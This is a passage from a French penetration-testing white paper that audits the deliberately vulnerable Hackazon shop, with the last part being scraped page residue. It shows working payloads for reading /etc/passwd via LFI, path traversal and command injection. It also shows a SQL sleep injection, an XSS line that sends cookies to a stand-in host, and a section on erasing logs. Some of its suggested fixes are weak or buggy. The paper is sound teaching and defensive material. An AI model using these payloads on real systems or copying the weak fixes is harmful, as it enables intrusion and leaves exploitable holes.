3. Une interface systme (shell en anglais) est une couche logicielle qui fournit linterface utilisateur dun systme dexploitation.
Il correspond la couche la plus externe de ce dernier. Linterface systme est utilise comme diminutif de linterface utilisateur
du systme dexploitation. (Source : Wikipdia)
17
Chapitre 5
Phase 5 : Effacement des traces

Une fois que les accs ont t obtenus et que le hacker a install sa ou ses backdoors, il est important pour ce dernier deffacer ses traces.
En effet, cela va lui permettre de dissimuler son intrusion, et de cacher ces actions dans le but de rendre
beaucoup plus complexes lanalyse forensique 1 . Ainsi, la dcouverte de la vulnrabilit et de linstallation de backdoors sera plus difficile dtecter et supprimer. Cela lui permettra de garder le contrle
sur la machine plus longtemps.
Pour cela, le hacker va effacer les logs lis son activit (pas tous les logs, car cela attirerait lattention), supprimer et / ou bloquer les alarmes des IDS 2 .
Cela permet aussi au hacker de limiter les informations permettant de remonter jusqu lui, ou de
facilit des poursuites judiciaires.
Cette partie va surtout tre utilise par des hackers malhonntes, ou lors daudit Red Team 3 afin de
tester les capacits de dtection et de rponse un incident du service informatique face une attaque
relle.
1. Lanalyse forensique en informatique signifie lanalyse dun systme informatique aprs incident. Par exemple une analyse
forensique peut tre effectue aprs une attaque de virus, ou plus difficilement, aprs lintrusion dun rootkit. (Source : Wikpdia)
2. Systme de Dtection dIntrusions
3. Laudit Red Team privilgie une valuation raliste de la robustesse dune organisation dans son ensemble et face des
attaquants dtermins. Elle consiste crer une quipe dattaquant, dans le plus grand secret, et de lui faire attaquer lorganisation
afin dvaluer la capacit de lorganisation, notamment du service informatique, dtecter lattaque et se dfendre en temps rel.
18
Quatrime partie
Recueil des 7 catgories de failles
19
Chapitre 6
"Upload"
6.1
Prsentation
La faille Upload permet un attaquant duploader un fichier malicieux sur le serveur pour obtenir un
accs, excuter des commandes, ou en prendre le contrle.
Dans notre cas, il est aussi possible de saturer le disque dur en crant, via un script, de multiples
comptes, uploadant chacun un fichier de grande taille en tant quavatar.
On retrouve cette faille au niveau des formulaires dupload de fichiers, avec les balises <form> et
<input type=file>.
6.2
Dcouverte
La faille a t dcouverte manuellement. Lupload de fichier est souvent un point sensible sur les
sites Web. Cest donc tout naturellement que jai test la robustesse dHackazon sur ce point.
6.3
Exploitation
La premire chose faire est de se crer un compte sur le site. Ensuite, on se rend sur la page
ddition du profil afin de choisir une photo de profil (un avatar). Le formulaire nous permet duploader
un fichier, une image est logiquement attendue. Cependant, il ny a pas de vrification concernant lextension du fichier upload. De ce fait, il est trs simple duploader un fichier PHP qui va tre excut par
le serveur. Ainsi, nous pouvons uploader un webshell 1 . Le webshell ainsi upload est accessible en se
rendant sur lURL pointant sur le fichier, disponible en regardant les sources.
6.4
Scurisation
Dsactiver linterprtation de PHP dans le dossier qui stocke les images uploades sur le profil de
lutilisateur. Ainsi, uploader un shellcode naura pas dincidence, ne pouvant tre interprt. Voici un
exemple pour un serveur Apache, rajouter dans le dossier /etc/apache2/sites-available/ dans le fichier
relatif au site web :
1
2
3
4
5
6
7
8
9
## Correction Faille Upload interpretation php

<Directory /var/www/hackazon/web/user_pictures/>
# Show .php file as plaintext file
AddType text/plain .php
# Disable mod_php
# Directive la plus importante puisquelle desactive
# l interpretation du PHP
php_admin_flag engine off
</Directory>
Listing 6.1 Configuration Apache pour empcher linterprtation des fichiers PHP dans un rpertoire
spcifique
1. Un webshell est un script crit en langage web permettant lexcution de commandes shell
20
Tests dintrusion
Cot client, il est extrmement compliqu de parfaitement bloquer lupload arbitraire / non dsir de
fichiers.
Il est cependant possible de complexifier le procd pour un attaquant. Plusieurs procds peuvent tre
mis en place :
On peut vrifier lextension du fichier upload lors de lupload, et refuser tous fichiers nayant pas lextension jpeg, jpg, png, bmp, etc... Cette technique peut tre bypass en ajoutant deux extensions au fichier
(fichier.php.jpeg), mais le site Hackazon sen protge en renommant le point de la premire extension
avec un underscore (fichier_php.jpeg).
Il est utile dinterdire les fichiers non attendus en utilisant une whitelist contenant les extensions attendues.
1
2
3
4
5
6
7
8
9
10
11
<?php
// On cree un tableau specifiant les extensions attendues
$tab_extensions = array( .png, . gif , .jpg , .jpeg , .bmp);
// On recupere lextension
$extension = strrchr ($_FILES[image][name], . ) ;
if (! in_array($extension, $extensions)) // Si l extension nest pas dans le tableau
{
$erreur = Vous devez uploader un fichier de type png, gif , jpg, jpeg ou bmp.;
}
?>
Listing 6.2 Utilisation dune whitelist

Pour viter de recevoir des fichiers dune taille trop importante, qui pourrait, terme, surcharger le
disque dur, nous pouvons utiliser les arguments suivants dans notre formulaire :
1 <form method="POST" action="upload.php" enctype="multipart/formdata">
2
<! On limite le fichier a 1Mo soit 1024 1024 1 Bytes >
3
<input type="hidden" name="MAX_FILE_SIZE" value="1048576">
4
Fichier : <input type=" file " name="avatar">
5
<input type="submit" name="envoyer" value="Uploader">
6 </form>
Listing 6.3 Code PHP pour limiter la taille du fichier upload

La taille est spcifie en octet.
Cependant, la taille du fichier peut tre modifier par un attaquant. Il est possible de rcuprer le code
de la page et de modifier la variable MAX_FILE_SIZE. De plus, on ne peut faire confiance au tableau
global de la variable $_FILES qui peut tre trafiqu.
On peut donc utiliser le code suivant :
1
2
3
4
5
6
7
8
9
<?php
// Taille max en octets
$taille_max = 1048576;
// On recupere la taille du fichier
$taille = filesize ($_FILES[avatar][ tmp_name]);
if ( $taille >$taille_max) {
$erreur = Le fichier est trop gros ... ;
}
?>
Listing 6.4 Code PHP pour vrifier la taille du fichier upload

Pour plus de scurit, cot serveur, on peut analyser les headers des fichiers uploads pour vrifier
quils correspondent bien aux extensions envoyes.
Le nom du fichier peut aussi poser des problmes, notamment sil contient des accents, des caractres spciaux, des espaces, etc...
Il est donc important de formater le nom du fichier avant de lenregistrer sur le serveur.
Thibault MILLANT
21
Juillet 2016
Tests dintrusion
Voici un exemple de code :

1
2
3
4
5
6
7
8
9
10
11
<?php
$fichier = strtr ( $fichier ,

AAAAAACEEEEIIIIOOOOOUUUUYaaaaaaceeeeiiiiooooouuuuyy);
// On recupere le nom formate dans la variable $fichier
// En dessous, il y a l expression reguliere qui remplace
// tout ce qui nest pas une lettre non accentuees ou un chiffre
// dans $fichier par un tiret "" et qui place le resultat dans $fichier .
$fichier = preg_replace( /([^. az09]+)/i, , $fichier ) ;
?>
Listing 6.5 Code PHP pour vrifier la taille du fichier upload
6.5
Surveillance
Les logs de cette attaque sont visibles dans /var/log/apache2/other_vhosts_access.log
Figure 6.1 Log faille Upload
Thibault MILLANT
22
Juillet 2016
Chapitre 7
CSRF : Cross-Site Request Forgery

7.1
Prsentation
Le nom CSRF vient de Cross-Site Request Forgery qui, si lon essaie de donner une dfinition en franais, signifie Falsification de requte inter-sites. On nest pas [beaucoup] plus
avanc, je sais.
En fait, il sagit deffectuer une action visant un site ou une page prcise en utilisant lutilisateur comme dclencheur, sans quil en ait conscience.
On va deviner un lien quun utilisateur obtient habituellement, et tout simplement faire en
sorte quil clique lui-mme sur ce lien.
(Source : Le blog du hacker)
Figure 7.1 Schma explicatif (Source : Le blog du hacker)
23
Tests dintrusion
7.1.1
Fonctionnement
En reprenant lhistoire ci-dessus, on peut imaginer que sur un blog donn, le lien de suppression dun article soit le suivant :
http://www.monblog.fr/del.php?id=1
Ici, id=1 signifie quon souhaite supprimer larticle dont lidentifiant est 1, typiquement il
sagit du premier article.
Si maintenant un visiteur non connect la page dadministration clique sur un tel lien, il
aura un message du type :
Vous navez pas les droits pour supprimer cet article, veuillez vous connecter et ressayer.
Normal, un visiteur quelconque na pas le droit dditer ou supprimer les articles dun blog
qui ne lui appartient pas.
Mais si maintenant le visiteur quelconque connat ce lien, il lui suffit denvoyer le lien
ladministrateur en faisant en sorte que ce dernier clique.
Que se passe-t-il une fois que ladministrateur clique ?
Le lien de suppression sexcute avec succs car ladministrateur est bien connect et
son article se retrouve ainsi supprim.
(Source : Le blog du hacker)
7.2
Dcouverte
La faille a t dcouverte lors dun scan du site Web, effectu par Arachni.
Ce scanner a test de nombreuses dformations de lURL pour provoquer des comportements anormaux (diffrents types de failles : Path Traversal, File Inclusion, OS Command Injection, etc.).
7.3
Exploitation
Arachni, dans son rapport, explique quil est possible de trouver une faille de type CSRF au niveau
de la partie wishlist dHackazon (http://hackazon.lc/wishlist/).
Cependant, je ne suis pas parvenu exploiter la vulnrabilit. Il est possible que cette alerte soit un
faux positif.
Cette partie du site utilise un systme de tokens, gnralement utilis pour se protger de cette faille,
comme dtaill dans la partie suivante.
7.4
Correctif
Une premire mesure est de vrifier si le header dorigine est prsent et sil correspond celui du
site dorigine.
Il est ensuite possible de vrifier que le referer correspond bien au site dorigine.
Thibault MILLANT
24
Juillet 2016
Tests dintrusion
Des dfenses plus spcifiques existent :
7.4.1
Cration de tokens synchroniss
chaque chargement de page, on gnre un token alatoire. Ce token est unique pour chaque utilisateur, sa valeur alatoire est de taille importante, et gnr avec un gnrateur de nombre alatoire
cryptographique.
Ce token est ajout un champ cach dun formulaire, ou pass par lURL si le chargement dune
page se fait avec la mthode GET.
Le serveur rejette la requte si la validation du token choue.
Pour PHP et Apache, on peut utiliser CSRFProtector Project.
7.4.2
Systme de dfense double cookies
Si stock le token dans une session est problmatique, il est possible denvoyer un nombre alatoire
via un cookie et via un paramtre de la requte afin que le serveur puisse vrifier la validit de la requte
si les deux informations correspondent.
7.4.3
Encrypted Token Pattern
Aprs une authentification russie, le serveur gnre un token unique avec lidentifiant de lutilisateur,
un timestamp, et un sel (nonce), en utilisant une cl unique prsente seulement sur le serveur. Ce token
est envoy au client et embarqu dans un champ cach.
A chaque requte, le serveur lit et dchiffre le token avec la cl utilise pour le gnrer.
Une fois dchiffr, lidentifiant de lutilisateur est compar avec lutilisateur actuellement connect, et le
timestamp avec le temps actuel.
7.4.4
Header customis
Il est possible de modifier le header en ajoutant : X-Requested-With : XMLHttpRequest.

On parle de SOP pour Same-Origin Policy.
Thibault MILLANT
25
Juillet 2016
Chapitre 8
LFI : Local File Inclusion

8.1
Prsentation
La faille LFI tient son nom de Local File Inclusion (Inclusion de fichier local). Elle permet
un utilisateur dinclure des fichiers locaux (prsent sur le serveur cible) partir dune URL.
Ces fichiers peuvent trs bien tre en dehors du rpertoire racine du site web. Des fichiers sensibles comme ceux contenant des donnes personnelles et notamment des mots
de passe peuvent donc tre inclus et rcuprs.
On a souvent besoin dinclure un fichier dans une page de faon tout fait lgitime
comme sur lexemple qui suit :
http ://exemple.com/vulnerable.php ?page=menu.php
Seulement le fait de vrifier si ce fichier existe ne suffit pas, il faut sassurer quil soit celui
que lon veut.
Notez que cette faille permet galement dexcuter du code PHP sur le serveur distant.
(Source : Le Blog du Hacker)
8.2
Dcouverte
8.3
Exploitation
Habituellement cette faille peut permettre de rcuprer des informations comme les noms des utilisateurs de votre serveur et leurs mot de passe :
http ://hackazon.lc/account/help_articles.php ?page=/etc/passwd%00
On indique le fichier que lon souhaite afficher. Le %00 de fin correspond au caractre nulle, indiquant la fin de la chane.
26
Tests dintrusion
Figure 8.1 Rsultat LFI
On peut galement rcuprer le code source dune page PHP ou excuter des commandes PHP
distance en les postant vers une url spcifique.
Dans le pire des cas, un shell PHP peut tre install sur votre serveur afin dautoriser un utilisateur
excuter des commandes distance.
On a accs dautres fichiers de configuration, comme les fichiers SSH. Trs utile pour connatre
les utilisateurs autoriss se connecter.
Il existe aussi les RFI 1 consistant rediriger vers une page prsente sur un autre serveur.
La page prcdente ne semble pas faillible aux RFIs.
8.4
Correctifs
Afin de assainir notre URL, nous pouvons ajouter ces lignes dans notre fichier PHP :
1
2
3
4
5
6
7
<?php
if ( isset ($_GET[page])) {
include ( "$_GET[page]". ".php");
} else {
include ( " error .php");
}
?>
Listing 8.1 Correction de la faille LFI par concatnation

Dans ce cas, on passe en paramtre GET le nom de la page sans son extension, et on ajoute lextension
lors du traitement.
Pour accder la page delivery.php, on passe en paramtre "delivery", et notre script PHP soccupe de
forcer lextension, et dappeler "delivery.php".
Cependant, ce correctif peut tre passer en utilisant le caractre NULL en hexadcimal : %00, qui
va terminer les chanes et ne pas tenir compte de la suite, donc du rajout de lextension PHP.
1. Remote File Inclusion
Thibault MILLANT
27
Juillet 2016
Tests dintrusion
Une autre technique est donc de tester le nom pass en paramtre, et dafficher la page en fonction :
1
2
3
4
5
6
7
<?php
if ($_GET[page] == "delivery") {
include ( " delivery .php");
} else {
include ( " error .php");
}
?>
Listing 8.2 Correction de la faille LFI

Si lutilisateur essaye de modifier de paramtre GET de lURL, il tombera sur une page derreur.
Nous pouvons aussi avoir recours diffrentes fonctions PHP pour scuriser nos entres utilisateurs,
comme :
stripslashes ($str) ; : Supprime les antislashs,
basename ($path) ; : Retourne le nom de la composante finale du chemin,
realpath ($path) ; : Retourne le chemin absolue.
Cependant, la technique la plus sre reste de ne pas faire confiance lutilisateur et de rajouter
lextension la fin du fichier.
8.5
Surveillance
Les logs de cette attaque sont visible dans /var/log/apache2/other_vhosts_access.log.

On peut aussi voir les erreurs, lors de tentatives, dans /var/log/apache2/error.log.
Figure 8.2 Log faille LFI, other vhosts access.log
Thibault MILLANT
28
Juillet 2016
Tests dintrusion
Figure 8.3 Log faille LFI, error.log
Thibault MILLANT
29
Juillet 2016
Chapitre 9
Path Traversal
9.1
Prsentation
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference
files with dot-dot-slash (../) sequences and its variations or by using absolute file paths, it
may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to
files is limited by system operational access control (such as in the case of locked or in-use
files on the Microsoft Windows operating system).
This attack is also known as dot-dot-slash, directory traversal, directory climbing and
backtracking.
Une attaque de type Path Traversal (galement connu sous le nom directory traversal)
vise accder des fichiers et des rpertoires qui sont stocks en dehors de la racine du
dossier web. En manipulant les variables qui font rfrence des fichiers avec "dot-dot-slash
(../)" et ses variations ou en utilisant des chemins absolus, il peut tre possible daccder
des fichiers et des rpertoires arbitraires stocks sur le systme de fichiers, y compris le code
source de lapplication, des fichiers de configuration et les fichiers critiques du systme. Il
convient de noter que laccs aux fichiers est limite par le systme de contrle daccs oprationnel (comme dans le cas des fichiers verrouills ou en cours dutilisation sur le systme
dexploitation Microsoft Windows).
Cette attaque est galement connu comme "point-point-slash", "directory traversal", "rpertoire escalade" et "retour en arrire".
(Source : OWASP)
9.2
Dcouverte
9.3
Exploitation
Tout comme la faille prcdente (LFI), nous pouvons rcuprer des informations sur les fichiers prsents sur les serveurs. Nous pouvons accder au code source de certaines pages, afficher des fichiers
de configuration (fichiers SSH par exemple), ou voir le contenu des fichiers de mots de passe.
http://hackazon.lc/account/documents?page=/../../../../../../../etc/passwd ou
http://hackazon.lc/account/documents?page=file:///../../../../../../../etc/passwd
30
Tests dintrusion
Nous cherchons remonter le plus haut possible, dans larchitecture, jusqu la racine, puis nous
indiquons le chemin vers le fichier afficher.
Avec lURL prcdente, pour obtenons :
Figure 9.1 Rsultat Path Traversal
9.4
Correctif
Un moyen de sen prmunir peut consister utiliser la fonction PHP str_replace :

1
<?php str_replace( ../ , , $_GET[fichier ]) ;?>
Listing 9.1 Correction de la faille Path Traversal

Cette fonction va supprimer les "../" du paramtre reu en GET.
Nous pouvons utiliser une boucle, au besoin, pour itrer la suppression.
Cela a pour but de assainir lURL. Si la page continue afficher des informations non dsires aprs
assainissement, il est possible que votre page soit faillible aux RFIs. Dans ce cas je vous recommande
de suivre le correctif pour les RFIs.
Sachez cependant que cela ne corrige pas compltement la faille. En effet, il est possible de remplacer le "/" par sa valeur en hexadcimal : %2F.
LURL scrit ainsi :
http://hackazon.lc/account/documents?page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Une autre technique peut tre de tester le nom pass en paramtre, et dafficher la page en fonction,
comme dans le correctif pour la faille LFI.
Beaucoup de correctifs corrigent la fois les failles LFIs et Path Traversal.
Thibault MILLANT
31
Juillet 2016
Tests dintrusion
9.5
Surveillance
Nous pouvons trouver des informations sur les Path Traversal dans un fichier de log Apache :
/var/log/apache2/other_vhosts_access.log
Figure 9.2 Log faille Path Traversal
Thibault MILLANT
32
Juillet 2016
Chapitre 10
Operating System command injection

10.1
Prsentation
Une injection de commandes systmes consiste faire excuter par le serveur des commandes
systmes, envoyes travers une application Web, afin deffectuer des actions, ou de rcuprer des
informations (fichier de comptes utilisateurs, fichier de configuration SSH, etc.).
10.2
Dcouverte
10.3
Exploitation
Sur Hackazon, nous avons une page permettant de consulter des documents (deux liens sur la
page).
hackazon.lc/account/documents
Figure 10.1 Page de consultation de documents
Le nom du document sur lequel on clique est pass en GET au serveur. Il est donc ais de remplacer
le nom du document par des donnes choisies par lutilisateur.
Pour mettre en lumire cette faille, on essaye dinjecter des commandes dans lURL.
Ainsi, il est possible dafficher le contenu du fichier passwd en utilisant la commande /bin/cat /etc/passwd comme dans cet exemple :
http://hackazon.lc/account/documents?page=/bin/cat%20/etc/passwd
Cela nous affiche le contenu du fichier demand. On peut faire de mme avec le fichier de configuration SSH et rcuprer bon nombre dinformations trs utiles pour accder directement au serveur.
33
Tests dintrusion
10.4
Correction
10.4.1
Escapeshellarg
Le correctif consiste faire passer la page reue en post travers la fonction PHP escapeshellarg 1 .
Cette fonction ajoute des guillemets autour de largument reu et chappe les guillemets prsents dans
largument.
10.5
Surveillance
Nous pouvons trouver des informations sur les Path Traversal dans deux fichiers de log Apache.
Le premier nous donnera les erreurs des aux commandes excutes, et le second des infos sur les
trames :
/var/log/apache2/error.log /var/log/apache2/other_vhosts_access.log
Figure 10.2 Log faille OS Command Injection, error

1. https://secure.php.net/manual/en/function.escapeshellarg.php
Thibault MILLANT
34
Juillet 2016
Tests dintrusion
Figure 10.3 Log faille OS Command Injection, other vhosts access
10.6
Remarques
Cette faille porte sur une requte GET, mais le procd et les correctifs sont similaires pour une
requte POST.
Thibault MILLANT
35
Juillet 2016
Chapitre 11
Blind SQL Injection

11.1
Prsentation
Une injection SQL est comme son nom lindique une injection ou insertion de code SQL
via des donnes transmises depuis un site web. Une injection russie et correctement exploite permet de rcuprer des informations sensibles dune base de donnes ou encore de
modifier/supprimer/ajouter des donnes. Dune manire gnrale, toutes les actions lies
une base de donnes sont possibles. Habituellement ce type dinjection concerne PHP avec
une base SQL mais dautres langages comme ASP peuvent aussi tre concerns.
Ce type dinjection survient habituellement quand les donnes des utilisateurs sont utilises sans tre filtres ou vrifies.
Comme son nom lindique, linjection SQL laveugle consiste exploiter un site
faillible de la mme manire que celle quon a vu, cela prs que le rsultat (les messages
derreur) ne sont pas affichs sur la page.
Habituellement des outils complets sont utiliss pour automatiser tout cela. Autant vous
dire que ne pas afficher de messages derreurs est une bonne chose, mais le mieux est tout
de mme de rgler le problme la racine, on y vient.
11.2
Dcouverte
Les scanners OpenVAS et Nessus ont aussi dcouvert la vulnrabilit sur la page http://hackazon.
lc/category/view.
11.3
Exploitation
Sur le site dHackazon, nous avons deux pages faillibles ce type dattaque.
La premire est la page de login : http://hackazon.lc/user/login.
La seconde est la vue dune des catgories : http://hackazon.lc/category/view.
Sur la page de login, on peut effectuer une injection SQL dans le champ Username or Email. Pour
cela on tape une commande SQL qui va tre interprt non pas comme une chane de caractre, mais
comme une commande SQL.
On joue sur la mauvaise construction et la non sanitization de largument pass dans le formulaire.
Ici, nous pouvons crire or sleep(16) # afin de mettre la base de donnes en pause pendant 16
secondes et interrompre toutes transactions.
36
Tests dintrusion
Un temps plus loin peut avoir de lourdes consquences pour un site de-commerce, bloquant tout achat,
donc le business de lentreprise.
Sur la page dune des catgories, on peut, dans lurl, injecter la mme commande SQL :
http://hackazon.lc/category/view?id=49andsleep(16)=
Ainsi, nous mettons en pause la base de donnes comme dans lexemple prcdent.
Comme expliqu, cela peut avoir des consquences trs lourdes pour le business de lentreprise,
avec dimportantes pertes dargent, un agacement des clients ce qui impact limage de lentreprise.
Une tude plus approfondie peut conduire linjection dautres commandes, ayant dautres consquences, comme peut-tre la modification de la base de donnes (modification des prix de ventes), la
rcupration dinformations clients (cartes bancaires, mots de passe), ou la destruction dinformations
(suppression des comptes utilisateurs, des produits en vente, etc).
11.4
Correctif
On peut utiliser plusieurs fonctions en PHP afin de se protger des injections SQL :
mysqli_real_escape_sting () :
chappe les caractres spciaux dans les chanes de caractres.
addslashes () :
Retourne une chane de caractre avec les guillemets simples et doubles, les
backslashs et les caractres NULL, chapp avec des backslashes.
magic_quotes_gpc () :
chappe les caractres spciaux. Sactive dans la configuration du PHP.
requtes prpares : Une sorte de modle compil pour le SQL que vous voulez excuter, qui
peut tre personnalis en utilisant des variables en guise de paramtres.
procdures stockes : 5 Ensemble dinstructions SQL prcompiles, stockes dans une base de
donnes et excutes sur demande par le SGBD qui manipule la base de donnes.
Il est aussi recommand dutiliser des comptes utilisateurs accs limit pour empcher la modification ou la suppression dlments en base de donnes.
1.
2.
3.
4.
5.
https ://secure.php.net/manual/en/mysqli.real-escape-string.php
https ://secure.php.net/manual/en/function.addslashes.php
http ://aaroncameron.net/article.html ?aID=59
https ://secure.php.net/manual/fr/pdo.prepared-statements.php
https ://fr.wikipedia.org/wiki/Proc%C3%A9dure_stock%C3%A9e
Thibault MILLANT
37
Juillet 2016
Tests dintrusion
11.5
Surveillance
Nous pouvons trouver des informations sur les injections SQL dans un fichier de log Apache :
Figure 11.1 Log faille injection SQL
Thibault MILLANT
38
Juillet 2016
Chapitre 12
XSS : Cross-Site Scripting

12.1
Prsentation
XSS vient de Cross-Site Scripting et comme lacronyme CSS tait dj pris pour Cascading Style Sheets, on a utilis un X pour cross (croix en anglais).
La faille consiste injecter un script arbitraire dans une page pour provoquer une action
bien dfinie. Les autres utilisateurs excutent le script sans sen rendre compte ds louverture de la page.
Cross veut galement dire traverser, car lun des buts de la faille est dexcuter un script
permettant de transmettre des donnes depuis un site vers un autre.
Ce problme se situe principalement au niveau des cookies, car on peut par exemple
rcuprer les cookies dun site A depuis un site B. On peut ainsi rcuprer les cookies de
nimporte qui, mme de ladministrateur dun site.
Notez par ailleurs quon peut exploiter la faille XSS en JavaScript mais aussi avec dautres
langages.
On distingue deux types de failles XSS :
- XSS permanent
Cest lorsque le script est stock sur le serveur externe (base de donnes). Il est donc rcupr et excut tous moments sur le site par nimporte quel utilisateur.
- XSS non permanent (non persistant)
Le script est souvent intgr une URL et est excut sans tre stock sur un serveur.
On peut distinguer plusieurs possibilits non exhaustives dexploitation de cette faille :
- Une redirection de la page afin de nuire aux utilisateurs ou pour tenter une attaque de phishing.
- Voler des sessions ou des cookies. (Donc se faire passer pour un autre utilisateur pour
excuter des actions)
- Rendre le site inaccessible en utilisant des alertes en boucle ou tout autre moyen nuisible.
12.2
Dcouverte
Cependant, il ny avait pas dinformations donnes sur lexploitation.
39
Tests dintrusion
Le scanner Nessus a lui aussi trouv la vulnrabilit sur la page http://hackazon.lc/search.
12.3
Exploitation
Cette vulnrabilit permet dinjecter directement du code Javascript, ou de charger un fichier Javascript ou PHP depuis un serveur distant.
On remarque, grce aux diffrents rapports, que le champ de recherche peut tre vulnrable aux
injections XSS.
Nous pouvons injecter du code dans le champ de recherche (par exemple : <script>window.open("http ://monUrl/script.php ?param="+document.cookie)</script>) ou dans lUrl directement comme ici : http://
hackazon.lc/search?id=&searchString=<script>window.open("http://monUrl/script.php?param=
"+document.cookie)</script>.
Ici, nous sommes confronts une faille XSS non persistante. Elle nest pas stocke, et ne peut
donc tre recharge pour chaque utilisateur qui consulterait la page.
Cependant, elle reste utile, coupl du Social Engineering, en poussant un utilisateur cliquer sur
ce lien, via un forum, un email, etc...
Cela permettra de rcuprer un cookie, ou dautres informations, pour usurper lidentit de lutilisateur.
12.4
Correctif
Pour se protger de lexploit, on peut utiliser plusieurs fonctions PHP permettant deffacer les caractres spciaux utiliss par lattaquant lors de son injection XSS.
htmlentities : Permet dchapper les guillemets simples et doubles.
htmlspecialchars : Convertit les guillemets doubles et simples, lampersand (&), et les symboles
suprieur et infrieur .
Il est aussi recommand de dutiliser le paramtre HttpOnly dans la cration des cookies afin dempcher la rcupration de ces derniers en utilisant du Javascript. De ce fait, le cookie nest accessible
que depuis le protocole HTTP.
Attention cependant, cette configuration nest pas forcment supporte par tous les navigateurs.
12.5
Surveillance
Nous pouvons trouver des informations sur les XSS dans un fichier de log Apache :
Figure 12.1 Log faille XSS
Thibault MILLANT
40
Juillet 2016
Cinquime partie
Conclusion
41
Tests dintrusion
Vous avez srement dj entendu parler des failles prsentes dans ce document, elles sont connues
et exploites depuis plusieurs annes.
Malgr cela, elles restent trs prsentes sur le Web, comme le montre le top 10 de lOWASP.
Dans leur dernire version du document, datant de 2013, linjection (SQL, OS, LDAP, etc.) est la faille
que lon retrouve le plus.
Le XSS arrive en 3e position.
La CSRF se trouve en 8eposition.
Il est important de continuer sensibiliser les dveloppeurs et les usagers dInternet, aux bonnes
pratiques de scurit, afin de limiter les dgts gnrs par ces diffrentes vulnrabilits.
Dans ce livre, jai donc tent de reprendre certaines vulnrabilits en les dtaillant au maximum, en
utilisant le cas concret de la plateforme Hackazon, afin de faciliter la comprhension de leur fonctionnement et de leur exploitation.
Thibault MILLANT
42
Juillet 2016

(Thibault MILLANT) Pentest / Tests D'intrusion: Cas Pratique Sur Le Site E-Commerce Hackazon

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

(Thibault MILLANT) Pentest / Tests D'intrusion: Cas Pratique Sur Le Site E-Commerce Hackazon

Transféré par

Droits d'auteur :

Formats disponibles

Livre Blanc

Pentest / Tests dIntrusion

Where Passion Leads to Excellence

Table des matires

Les mtiers de la Cyber Scurit

0.5 Le serveur cible . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

III Audit de scurit du site Web Hackazon

3 Phase 3 : Obtenir des accs

4 Phase 4 : Maintien des accs

5 Phase 5 : Effacement des traces

Recueil des 7 catgories de failles

7 CSRF : Cross-Site Request Forgery

8 LFI : Local File Inclusion

10 Operating System command injection

11 Blind SQL Injection

12 XSS : Cross-Site Scripting

Les mtiers de la Cyber Scurit

Figure 1 Gestion de la conformit par les risques mtiers. (Source : Inventy)

Expert en scurit des systmes dinformation

Expert des tests dintrusion

Responsable de la scurit des systmes dinformation

Listing 1 Fichier de configuration Apache pour le site Hackazon

La configuration dApache2, laisse par dfaut, est la suivante :

Listing 2 Fichier de configuration Apache2

Audit de scurit du site Web

2.1 Arachni : Scanner de Vulnrabilits Web

Phase 3 : Obtenir des accs

Phase 4 : Maintien des accs

Phase 5 : Effacement des traces

Recueil des 7 catgories de failles

## Correction Faille Upload interpretation php

Listing 6.2 Utilisation dune whitelist

Listing 6.3 Code PHP pour limiter la taille du fichier upload

Listing 6.4 Code PHP pour vrifier la taille du fichier upload

Voici un exemple de code :

Listing 6.5 Code PHP pour vrifier la taille du fichier upload

Les logs de cette attaque sont visibles dans /var/log/apache2/other_vhosts_access.log

Figure 6.1 Log faille Upload

CSRF : Cross-Site Request Forgery

Figure 7.1 Schma explicatif (Source : Le blog du hacker)

Des dfenses plus spcifiques existent :

Cration de tokens synchroniss

Systme de dfense double cookies

Encrypted Token Pattern

Il est possible de modifier le header en ajoutant : X-Requested-With : XMLHttpRequest.

LFI : Local File Inclusion

Figure 8.1 Rsultat LFI

Listing 8.1 Correction de la faille LFI par concatnation

1. Remote File Inclusion

Listing 8.2 Correction de la faille LFI

Les logs de cette attaque sont visible dans /var/log/apache2/other_vhosts_access.log.

Figure 8.2 Log faille LFI, other vhosts access.log

Figure 8.3 Log faille LFI, error.log

Figure 9.1 Rsultat Path Traversal

Un moyen de sen prmunir peut consister utiliser la fonction PHP str_replace :

<?php str_replace( ../ , , $_GET[fichier ]) ;?>

Listing 9.1 Correction de la faille Path Traversal

Figure 9.2 Log faille Path Traversal

Operating System command injection

Figure 10.1 Page de consultation de documents

Figure 10.2 Log faille OS Command Injection, error

Figure 10.3 Log faille OS Command Injection, other vhosts access

Blind SQL Injection